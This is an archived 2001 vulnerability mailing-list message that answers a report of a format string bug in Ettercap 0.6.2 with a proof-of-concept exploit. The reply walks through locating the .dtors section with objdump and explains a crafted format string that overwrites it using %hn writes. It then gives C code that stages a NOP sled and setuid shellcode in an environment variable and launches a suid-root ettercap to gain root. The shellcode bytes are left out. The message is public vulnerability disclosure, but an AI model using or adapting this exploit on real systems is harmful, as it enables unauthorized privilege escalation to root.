Proof of concept for the format bug in Ettercap 0.6.2From: BAILLEUX Christophe (firstname.lastname@example.org)
- Previous message: Rodrigo Barbosa: "Re: uugetty mgetty also..."
- In reply to: Blue Boar: "Potential hole in Ettercap 0.6.2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 5 Dec 2001 12:25:00 +0100 (CET) From: BAILLEUX Christophe <email@example.com> To: Blue Boar <BlueBoar@thievco.com>
Firstly, let's retrieve the address of the section .dtors:
cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap
/usr/local/sbin/ettercap: file format elf32-i386
Contents of section .dtors:
8119a70 ffffffff 00000000 ........
So the fmt string is composed of:
- "000" for allignment.
- "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
expect to write (here .dtors + 4 -- 0x8119a74.)
- "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.
This format string was built using fmtbuilder:
---- ettercap-exp.c ----
char shellcode =
/* setuid(0) */
/* Aleph 1 shellcode */
char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";
memset(buf, 0x90, 1024);
memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode));
setenv("SHELLCODE", buf, 1);
execl("/usr/local/sbin/ettercap", "ettercap", fmt, 0x0);
---- ettercap-exp.c ----
This demo is made with a suid root version.
cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
may the packets be with you...
Invalid host address
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:firstname.lastname@example.org
On Tue, 4 Dec 2001, Blue Boar wrote:
> Goobles sent another post to vuln-dev today, which was rejected due
> to personal attacks in their note. I want to check out their claim,
> however. If you want to see their original posting, it's on their
> web site like the others, I'm sure. It includes a claimed exploit,
> which cannot be posted due to their wishes that it not be separated
> from the advisory. If someone wants to write an independent exploit,
> I'd be happy to post that, provided it follows the list rules,
> of course.
> Here's the basic problem:
> ettercap %x%x%x%x%x%x%x
> ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
> may the packets be with you...
> Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
> Gobbles' point is that there is an option to configure it suid,
> so this could be exploitable when that is used. Why someone
> would want a packet capture program to be used by non-priv users..
> Well, I'm sure there's a good reason somewhere in the world.
> Is anyone using it that way? Are there OS distributions that come
> with Ettercap installed by default? And, of course, is it suid?
> (I can't imagine it would be.) The workaround is obvious, don't
> run it suid or allow remote users who do not already have a shell
> to execute it with a command-line parameter (such as via a web